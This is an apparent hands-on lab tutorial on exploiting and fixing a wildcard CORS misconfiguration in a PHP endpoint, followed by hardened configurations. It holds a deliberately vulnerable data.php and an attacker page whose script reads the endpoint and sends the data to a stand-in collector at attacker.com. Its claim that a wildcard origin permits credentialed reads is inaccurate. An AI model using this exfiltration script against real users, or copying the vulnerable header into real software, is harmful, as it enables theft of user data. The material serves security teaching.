Objective
Learn how to exploit misconfigured Cross-Origin Resource Sharing (CORS) headers to bypass the Same-Origin Policy and steal sensitive data. Understand how to mitigate this vulnerability by implementing a secure CORS configuration.
Scenario
You are testing a web application that exposes sensitive data through an API endpoint. Due to a misconfigured CORS policy (e.g., Access-Control-Allow-Origin: *), an attacker can craft malicious web pages to send authenticated requests to the vulnerable server and steal sensitive data from legitimate users.
Lab Setup
Prerequisites:
- Basic knowledge of JavaScript, HTTP requests, and CORS.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
- PHP Script with Misconfigured CORS
  - Create a file data.php:

```php
<?php
// Wildcard origin: any website may read this response. This is the
// misconfiguration the lab exercises.
header("Access-Control-Allow-Origin: *");
header("Content-Type: application/json");

$data = [
    "username" => "alice",
    "email"    => "[email protected]",
    "balance"  => 5000
];
echo json_encode($data);
?>
```

- Running the Application
  - Start the Apache server.
  - Place data.php in the web server's root directory (htdocs for XAMPP).
  - Open http://localhost/data.php in your browser to verify the JSON response.
- Attacker's Malicious Web Page
  - Create a file malicious.html to simulate an attack:

```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Malicious Page</title>
</head>
<body>
  <h2>Loading... Please wait</h2>
  <script>
    // Cross-origin read of the vulnerable endpoint; the browser lets the page
    // read the response because the server answers with
    // Access-Control-Allow-Origin: *.
    fetch('http://localhost/data.php', { credentials: 'include' })
      .then(response => response.json())
      .then(data => {
        // Forward the retrieved JSON to the attacker-controlled collector.
        fetch('http://attacker.com/steal.php?data=' + JSON.stringify(data));
      });
  </script>
</body>
</html>
```
Exploitation Steps
Step 1: Exploiting Misconfigured CORS
- Open malicious.html in the attacker's domain or locally.
- The malicious script sends a cross-origin request to http://localhost/data.php.
- The browser allows the request because of the wildcard CORS policy (Access-Control-Allow-Origin: *).
- The sensitive data is sent to the attacker's server (http://attacker.com/steal.php).
Expected Result:
- The attacker successfully retrieves sensitive user data from the vulnerable server.
Solution and Prevention
Problem Analysis
- The server allows requests from any origin due to Access-Control-Allow-Origin: *.
Fixing the Vulnerability
- Restrict Allowed Origins
  - Specify trusted domains in the CORS header:

```php
// Allowlist of exact origins. Compare strictly and cope with a request
// that carries no Origin header at all (same-origin or non-browser clients).
$allowed_origins = ['https://trustedsite.com'];
$origin = $_SERVER['HTTP_ORIGIN'] ?? '';
if (in_array($origin, $allowed_origins, true)) {
    header("Access-Control-Allow-Origin: {$origin}");
}
header("Content-Type: application/json");
```

- Avoid Wildcards with Credentials
  - Do not use * when Access-Control-Allow-Credentials: true is set:

```php
header("Access-Control-Allow-Credentials: true");
header("Access-Control-Allow-Origin: https://trustedsite.com");
```

- Validate Authentication on Sensitive Endpoints
  - Require authentication tokens or session validation for sensitive data access.
- Use Preflight Requests for Sensitive Actions
  - Enforce preflight checks (OPTIONS method) for state-changing requests.
- Implement Content Security Policy (CSP)
  - Restrict where scripts can be loaded from:

```php
header("Content-Security-Policy: default-src 'self';");
```
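A hardened data.php that combines the measures above (exact-match allowlist, no wildcard with credentials, preflight handling, session check), added here as an example and not the lab's own file. The allowlist entry https://trustedsite.com comes from the fix above; the session key user_id and the payload values are assumptions.

```php
<?php
// Hardened replacement for data.php (added example, not the lab's original file).
// Assumption: the only legitimate browser front-end lives at https://trustedsite.com.
$allowed_origins = ['https://trustedsite.com'];

$origin = $_SERVER['HTTP_ORIGIN'] ?? '';

// Exact, case-sensitive match of the whole scheme://host[:port] string.
// No regex or substring checks, so "https://trustedsite.com.evil.example" and
// the literal origin "null" (sandboxed iframes, file:// pages) are rejected.
$origin_allowed = in_array($origin, $allowed_origins, true);

// Cached responses must vary per Origin, or a proxy/CDN could serve one
// origin's CORS headers to another.
header('Vary: Origin');

if ($origin_allowed) {
    // Echo the validated origin (never "*"), and only then allow credentials.
    header('Access-Control-Allow-Origin: ' . $origin);
    header('Access-Control-Allow-Credentials: true');
    header('Access-Control-Allow-Methods: GET, OPTIONS');
    header('Access-Control-Allow-Headers: Content-Type');
    header('Access-Control-Max-Age: 600');
}

// Answer the preflight without touching the data.
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code($origin_allowed ? 204 : 403);
    exit;
}

// Sensitive data still requires an authenticated session, independent of CORS.
// Assumption: the login flow stores the user id in $_SESSION['user_id'].
session_start();
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    header('Content-Type: application/json');
    echo json_encode(['error' => 'authentication required']);
    exit;
}

header('Content-Type: application/json');
// Constructed sample payload.
echo json_encode([
    'username' => 'alice',
    'email'    => 'alice@example.com',
    'balance'  => 5000,
]);
```

With this file in place, a request from malicious.html on any other origin receives no Access-Control-Allow-Origin header, so the browser withholds the response body from the page.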
Testing After Fix
- Reload malicious.html after applying the fix.
- Expected Result:
  - The browser blocks the cross-origin request due to the restricted CORS policy.
  - No data is sent to the attacker.
Conclusion
In this lab, you exploited misconfigured CORS to perform unauthorized cross-origin requests and steal sensitive data. You also learned how to mitigate this risk by restricting allowed origins, validating authentication, and properly configuring CORS headers.